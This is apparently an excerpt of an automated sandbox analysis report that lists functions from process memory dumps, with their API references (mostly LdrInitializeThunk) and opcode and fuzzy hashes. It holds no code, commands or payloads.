API String ID: 2994545307-0
Opcode ID: 34294af986dae85615cc2db593bb993ea3b962505727b8d34dc1f9941577156d
Instruction ID: 90ec3273cf864cf431e1b453b030dcfe9dac13caf8720ffd9408213ca7d632b9
Opcode Fuzzy Hash: 34294af986dae85615cc2db593bb993ea3b962505727b8d34dc1f9941577156d
Instruction Fuzzy Hash: C142F978A09229CFCB65DF70C98879DB7B5BF88305F2485EAD50AA3244DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46D10, Relevance: 2.0, APIs: 1, Instructions: 542libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ba06cabe3528db784d3cf6e49b02469148be5832c4f6a0812447f5d021c69e8
Instruction ID: d70ff90b13a5049eb6122c88f5fb6b967054655f15455d9e7fd6082acc8d52d7
Opcode Fuzzy Hash: 2ba06cabe3528db784d3cf6e49b02469148be5832c4f6a0812447f5d021c69e8
Instruction Fuzzy Hash: 4842F978A09229CFCB65DF70C98879DB7B5BF88305F2485EAD50AA3244DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46D57, Relevance: 2.0, APIs: 1, Instructions: 535libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a5f8d3930c299385b0499c6ae07cc2ec522bf4ed4a7b065d6476c28ec0e9242
Instruction ID: 7299d5fb1e8ae27974ecc8021e09df43586a72eff37beaf3ae1d47dcb347e5e4
Opcode Fuzzy Hash: 0a5f8d3930c299385b0499c6ae07cc2ec522bf4ed4a7b065d6476c28ec0e9242
Instruction Fuzzy Hash: A442F978A09229CFCB65DF70C98879DB7B5BF88305F2485EAD50AA3244DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46D9E, Relevance: 2.0, APIs: 1, Instructions: 528libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9314cca11fbed645672294d2cbb580eec7cd31b489380de4692129704d4ae6c6
Instruction ID: 204cb3485e6085d22f04ee6ea0a06f9ea8f06065a7a878a2930db153c6eb8ad7
Opcode Fuzzy Hash: 9314cca11fbed645672294d2cbb580eec7cd31b489380de4692129704d4ae6c6
Instruction Fuzzy Hash: 7B42F974A09229CFCB65DF70C98879DB7B5BF88305F2445EAD50AA3244DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46DE5, Relevance: 2.0, APIs: 1, Instructions: 521libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 047a1b5b8eb61f62433aab2b61aaa85a20ce7ad5ad947729bf6305d587c6575c
Instruction ID: 957444ae403da3873925f0e08a6b7c0739d13e2a2b15a8877cf0690817bf30ee
Opcode Fuzzy Hash: 047a1b5b8eb61f62433aab2b61aaa85a20ce7ad5ad947729bf6305d587c6575c
Instruction Fuzzy Hash: D832F974A09229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46E2C, Relevance: 2.0, APIs: 1, Instructions: 514libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ec9bfd91c01e27644485ae02aacb7a6769b434f9043ea9c0950d81b083395f6
Instruction ID: cbfd0f3cd3d2ca6e606d515835f6564411aba401b39809151a94cb373c079824
Opcode Fuzzy Hash: 2ec9bfd91c01e27644485ae02aacb7a6769b434f9043ea9c0950d81b083395f6
Instruction Fuzzy Hash: 7D320974A09229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46E73, Relevance: 2.0, APIs: 1, Instructions: 507libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12acfca401d2d1d7eea51c6e23ee3a7c52900366e3ee1ea547f078957cb5c97b
Instruction ID: 26e3c0bed096a6983a543ad66a849eb7d04c1a978f05f33d1569e25b6451fe13
Opcode Fuzzy Hash: 12acfca401d2d1d7eea51c6e23ee3a7c52900366e3ee1ea547f078957cb5c97b
Instruction Fuzzy Hash: 82320974A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46EBA, Relevance: 2.0, APIs: 1, Instructions: 498libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62738f265af4c433356af47b011a10843f8762e0cbfbe05d9a1f87c35c27f5f2
Instruction ID: 4b750ef791dd63cd445f1420387b20df901fc9f43f9b3b186e84749d92fb0035
Opcode Fuzzy Hash: 62738f265af4c433356af47b011a10843f8762e0cbfbe05d9a1f87c35c27f5f2
Instruction Fuzzy Hash: 5D320974A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB319E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46EF8, Relevance: 2.0, APIs: 1, Instructions: 493libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 170594781c34c9397c64741d549e55440eb192486eab631379eb8c4b8c0daaa9
Instruction ID: 8feb8bff1140de8f4c264dc444a29bdeaffa61e6bea4ff8f7a2289d7982eb3d1
Opcode Fuzzy Hash: 170594781c34c9397c64741d549e55440eb192486eab631379eb8c4b8c0daaa9
Instruction Fuzzy Hash: 8432F974A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46F3F, Relevance: 2.0, APIs: 1, Instructions: 486libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39cb94a7d0a80016f917908c4fb70c2f5a004922c5aeb924ed8687bdc0599f3d
Instruction ID: 12ccc6bdcdb20d42764ea4fd358c0b4ae8dc0b3bcae72925ac20dbfbfd982b25
Opcode Fuzzy Hash: 39cb94a7d0a80016f917908c4fb70c2f5a004922c5aeb924ed8687bdc0599f3d
Instruction Fuzzy Hash: C6320974A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46F86, Relevance: 2.0, APIs: 1, Instructions: 479libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b715657bbde7ee8120bb61733ff8d9975493f9a68561aee2a2795a8ad497721e
Instruction ID: e5037197e86a905a85b6f84c7fee3869b1821c9573bc224e5c399f9092890992
Opcode Fuzzy Hash: b715657bbde7ee8120bb61733ff8d9975493f9a68561aee2a2795a8ad497721e
Instruction Fuzzy Hash: AB22F974A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A46FCD, Relevance: 2.0, APIs: 1, Instructions: 470libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f801ed7094ef6ddfc8bafcd2d08ee97bedecb2d5670506d0fdf9c2bb7a498600
Instruction ID: 656015baf191528582e307d4d3b4808b0539c5ebdf8b2feee70e7f256a8a6fa7
Opcode Fuzzy Hash: f801ed7094ef6ddfc8bafcd2d08ee97bedecb2d5670506d0fdf9c2bb7a498600
Instruction Fuzzy Hash: EB220A74A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A47021, Relevance: 2.0, APIs: 1, Instructions: 461libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 026062259e1de17eb18abb4eb110e96fdb1a85e53dde660165dee722bdefc71d
Instruction ID: 60e1af121637816cd0384e651873ea19088f56bd9218028f3c09262a27560ab2
Opcode Fuzzy Hash: 026062259e1de17eb18abb4eb110e96fdb1a85e53dde660165dee722bdefc71d
Instruction Fuzzy Hash: 89220974A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A47068, Relevance: 2.0, APIs: 1, Instructions: 454libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: da3faee8e66b31ce8323ed60da942cc3094189718a59f6aa964b28833cb318d9
Instruction ID: aa5f94010160fd4fc5cfd044db6e0ad3a5f838f15e1b2b517605561ce3b624d4
Opcode Fuzzy Hash: da3faee8e66b31ce8323ed60da942cc3094189718a59f6aa964b28833cb318d9
Instruction Fuzzy Hash: F822F974A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A470AF, Relevance: 1.9, APIs: 1, Instructions: 445libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9bb308ef66250c62ab8e3c5e54cc33ad39eb09a77fbcdcdd20d57d5776311ebb
Instruction ID: 59f2f7fe8dab8cbee074315e4a790695e1c191f5130ef4e666295eb553ee236f
Opcode Fuzzy Hash: 9bb308ef66250c62ab8e3c5e54cc33ad39eb09a77fbcdcdd20d57d5776311ebb
Instruction Fuzzy Hash: A9120A74A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A470ED, Relevance: 1.9, APIs: 1, Instructions: 440libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e258e3b1834f1a77bf0f5b877f663795ac62221013bab61a52d0666d85fbeb8e
Instruction ID: ea78a46ab5f444df236f23a62c6483347be5ea2707111a72a2d15ad196486e06
Opcode Fuzzy Hash: e258e3b1834f1a77bf0f5b877f663795ac62221013bab61a52d0666d85fbeb8e
Instruction Fuzzy Hash: 6212F974A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A47137, Relevance: 1.9, APIs: 1, Instructions: 433libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 81c897728809d279e9ef1fbce2885771b448a652b26a360babfbfe9237c505eb
Instruction ID: e58a99e58e6b48c0c51a888e4d36f46640af79eb48f05da8e48f7343a42248e0
Opcode Fuzzy Hash: 81c897728809d279e9ef1fbce2885771b448a652b26a360babfbfe9237c505eb
Instruction Fuzzy Hash: 3D120A74A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A47181, Relevance: 1.9, APIs: 1, Instructions: 426libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 79828740063dc96977215e133973e17e44b23bf71223df62faa2e1f36154ae6a
Instruction ID: 3984a2e6a8e2cdab3a9778c59915859a298d2ef8ac0df9f807db2faf0add6d6c
Opcode Fuzzy Hash: 79828740063dc96977215e133973e17e44b23bf71223df62faa2e1f36154ae6a
Instruction Fuzzy Hash: DF121A74A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A471CB, Relevance: 1.9, APIs: 1, Instructions: 419libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6f79ebac597a2a043681145d7d30cf3ad531a6babdbb53e0201f091d59f2902
Instruction ID: c1d2d06e6982b631f4279d996c9a34b973b214b7db2c4673afdf49afa5b5c71d
Opcode Fuzzy Hash: c6f79ebac597a2a043681145d7d30cf3ad531a6babdbb53e0201f091d59f2902
Instruction Fuzzy Hash: 5F121A74A08229CFCB65DF70C9887ADB7B5BF88305F2485EAD50AA3244DB359E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A47215, Relevance: 1.9, APIs: 1, Instructions: 410libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d70463d1e9c82b0af9fab02587eed108ee600cd45998abfddb310eb6a43c721b
Instruction ID: 64c308d239f65519fcc73141282c7c0233716c4f4e2b8c9d6a950e07a1891c77
Opcode Fuzzy Hash: d70463d1e9c82b0af9fab02587eed108ee600cd45998abfddb310eb6a43c721b
Instruction Fuzzy Hash: 2D021B74A08229CFCB65DF70C9887ADB7B5BF88345F1485EAD50AA3244DB349E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A47253, Relevance: 1.9, APIs: 1, Instructions: 405libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b91309d330b007a9d44b00f458ecb0b11d7ccb5a6b48a9ab41deef64d0394327
Instruction ID: b1c77c377affe1e5ab077735c637ee2f66ddd37fd057bff1bc8bfc48b0d31c79
Opcode Fuzzy Hash: b91309d330b007a9d44b00f458ecb0b11d7ccb5a6b48a9ab41deef64d0394327
Instruction Fuzzy Hash: 31022AB4A08228CFCB65DF70C9887ADB7B5BF88345F1485EAD50AA3244DB349E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A4729D, Relevance: 1.9, APIs: 1, Instructions: 398libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f6d562e24e14ce64a452db4f377b5438b0fb67164e7d1a18d7c0182faeb5671
Instruction ID: 33e2933accf9912716b4fcd7ca2e001a197d5f636eed76eef0567c102b202604
Opcode Fuzzy Hash: 0f6d562e24e14ce64a452db4f377b5438b0fb67164e7d1a18d7c0182faeb5671
Instruction Fuzzy Hash: 9C020AB4A08228CFCB65DB70C98879DB7B5BF88745F2485EAD50AA3244DB349E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A472E7, Relevance: 1.9, APIs: 1, Instructions: 391libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e9699c20d42a16b8f09a4de9199e10d2884e53060974c234f0e7c416afdc289
Instruction ID: 54e4494f2045e85673ef988045d70a167d61b66ab1d6399e86c65b777786902a
Opcode Fuzzy Hash: 4e9699c20d42a16b8f09a4de9199e10d2884e53060974c234f0e7c416afdc289
Instruction Fuzzy Hash: 79021BB4A08228CFCB65DB70C98879DB7B6BF88745F1485EAD50AA3344DB349E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A47331, Relevance: 1.9, APIs: 1, Instructions: 384libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7012bb8f02c7db32180c9631e3b094df37913517953101f776ed761c95fd7e98
Instruction ID: f7b91fb2ae60850073d0c2baf19bbc5e4b3c9faa0997bf30beadd8bc431b0831
Opcode Fuzzy Hash: 7012bb8f02c7db32180c9631e3b094df37913517953101f776ed761c95fd7e98
Instruction Fuzzy Hash: 98021CB4A08228CFCB65EB70C98879DB7B5BF88745F1485EAD50AA3344DB349D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A4737B, Relevance: 1.9, APIs: 1, Instructions: 375libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8fa5d2c457626d0313a378d803b61024ee83d1861a578c7fbc7448bd33c67df3
Instruction ID: 7bc79dd5510146e5c298a6d34355dd79087bd937c22973d1ae5b7cde2b7354fd
Opcode Fuzzy Hash: 8fa5d2c457626d0313a378d803b61024ee83d1861a578c7fbc7448bd33c67df3
Instruction Fuzzy Hash: C4F12C74A08228CFCB65EB70C88879DB7B6BF88745F1485EAD50AA3344DB349E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A473B9, Relevance: 1.9, APIs: 1, Instructions: 370libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6bb5871c8ea6ea0b7699f4a6ad285e265eeb9d2bdf083b36187d65be7be0b367
Instruction ID: fa4a9fde99abb3ae9ca27b87a8fbd2a49721fda1761f2830c9742ac8440bbd26
Opcode Fuzzy Hash: 6bb5871c8ea6ea0b7699f4a6ad285e265eeb9d2bdf083b36187d65be7be0b367
Instruction Fuzzy Hash: 1CF12D74A08228CFCB65EB70C88879DB7B5BF88745F1485EAD50AA3344DB349D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A47403, Relevance: 1.9, APIs: 1, Instructions: 363libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ea2c534b638e03c43d54dfe8bbd5760dc885b22234d5c01bbf8f7a621b3a9549
Instruction ID: 8ac1b89efdcbb0224d2fbbe7d4e5d94a1c94a4fbe9d488229233e86689be3c90
Opcode Fuzzy Hash: ea2c534b638e03c43d54dfe8bbd5760dc885b22234d5c01bbf8f7a621b3a9549
Instruction Fuzzy Hash: CCF12D74A08228CFCB65EB70C88879DB7B6BF88745F5485EAD50AA3344DB349E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A4744D, Relevance: 1.9, APIs: 1, Instructions: 356libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 401782e4a4f85198a2e8a38b7cee2c19b5e0a8dc0e58ef1a26e68e2a632ab3f2
Instruction ID: 468f70209e94d4a75ec9b9d4ec63d6e1830ae6e9e70c2f93cc1f5f587f22b86d
Opcode Fuzzy Hash: 401782e4a4f85198a2e8a38b7cee2c19b5e0a8dc0e58ef1a26e68e2a632ab3f2
Instruction Fuzzy Hash: 9BF12C74A08228CFCB55EB70C98879DB7B5BF88746F1085EAD50AA3344DB349D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A47497, Relevance: 1.8, APIs: 1, Instructions: 349libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a936265354df9c8beaf7f86160eba9fc4d2d706a21247c2e75732e1a9220bd8e
Instruction ID: b3518e8777ef4e1716b87f7c1f599b3df806448e93462e3e6a9c40d9e912e60b
Opcode Fuzzy Hash: a936265354df9c8beaf7f86160eba9fc4d2d706a21247c2e75732e1a9220bd8e
Instruction Fuzzy Hash: 25F11B74A08228CBCB55EB70C88879DB7B6BF88746F5085EAD50AE3244EB349D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A474E1, Relevance: 1.8, APIs: 1, Instructions: 342libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21b94fc19fc9564a05f1a4c3d2977911ecdb4cd6b670784a02afd0ce89e4d686
Instruction ID: ee2c8e1044653ecd7f2ad861d6c0ce5807650e71b2c19d66c2679ff59387adc6
Opcode Fuzzy Hash: 21b94fc19fc9564a05f1a4c3d2977911ecdb4cd6b670784a02afd0ce89e4d686
Instruction Fuzzy Hash: 27E12B74A08228CFCB55EB70C88879DB7B6BF88746F5085EAD50AE3244EB349D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A4752B, Relevance: 1.8, APIs: 1, Instructions: 335libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00A4767F

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b58b8bbfd19d578c37dc493eedcae48fc5491cd7f5952322e15b7010852a83b
Instruction ID: b73564a733bcd3ae9606a8e7aac1e1d2d757a4b08cf47c29ddae303109a93a47
Opcode Fuzzy Hash: 1b58b8bbfd19d578c37dc493eedcae48fc5491cd7f5952322e15b7010852a83b
Instruction Fuzzy Hash: C7E12B74A08228CBCB55EB70C88879DB7B6BF88746F5085EAD50AE3344EB349D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1DA34FF0, Relevance: 1.8, APIs: 1, Instructions: 290COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1DA353B6

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b0f182362a9fdd7821c2bdd39c23f9b82b86075714c09282367fe7de0387ca81
Instruction ID: 7c577fe6f2f6d6589439ec063e6772c08158f5818ddf07d38d3130d5fe1d436f
Opcode Fuzzy Hash: b0f182362a9fdd7821c2bdd39c23f9b82b86075714c09282367fe7de0387ca81
Instruction Fuzzy Hash: 0AB1CD78A00705AFCB04DFB9C490AAEB7F6BF89215B11892DC50ADB751DB35F841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00E230D8, Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E23139

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a60b38914a0c8b3bca03a60ba288f56ea833b7df5763bf026d21e94b6e6edc82
Instruction ID: 9bc004c9ab2dd716b8a9983972424fe56fb6b9532f0bed04896c8d99e818b8c0
Opcode Fuzzy Hash: a60b38914a0c8b3bca03a60ba288f56ea833b7df5763bf026d21e94b6e6edc82
Instruction Fuzzy Hash: 7251A631B003099BCB04EBB4C895AAEB7F6FF84304F158969E6129B251EF71ED15CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E230C8, Relevance: 1.6, APIs: 1, Instructions: 145libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00E23139

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4649e16e2ffed720f5ece737e7829a65e67af85a19a07fe1a85459ffa5931211
Instruction ID: f3a45a41d69c718dc32e951569a59d3020fcbf3b6868fbc7c3a38ca994131281
Opcode Fuzzy Hash: 4649e16e2ffed720f5ece737e7829a65e67af85a19a07fe1a85459ffa5931211
Instruction Fuzzy Hash: 0251F731A043099FCB04DFB4C899AAEB7F6FF84300F14896DE5129B251EF31A915CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A09E10, Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165fcc27201ff4b6780c83df0d4a2fd9580e0b313263a0c51675cfad93dd1a8a
Instruction ID: 9196dbe7cdfca6108fcef298b02836f9be58af47bc0ec5799afaf6bdd1d1141b
Opcode Fuzzy Hash: 165fcc27201ff4b6780c83df0d4a2fd9580e0b313263a0c51675cfad93dd1a8a
Instruction Fuzzy Hash: 02412571D043598FCB00DFA5D8046EEBBF5AF89310F14896AD508A7282DB74AC45CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 1DA367ED, Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DA3690A

Memory Dump Source

Source File: 0000000B.00000002.5695840448.000000001DA30000.00000040.00000001.sdmp, Offset: 1DA30000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3b971ac5308624bb11b8d899c101bb008c369c73f6e08693b143b82e6771f851
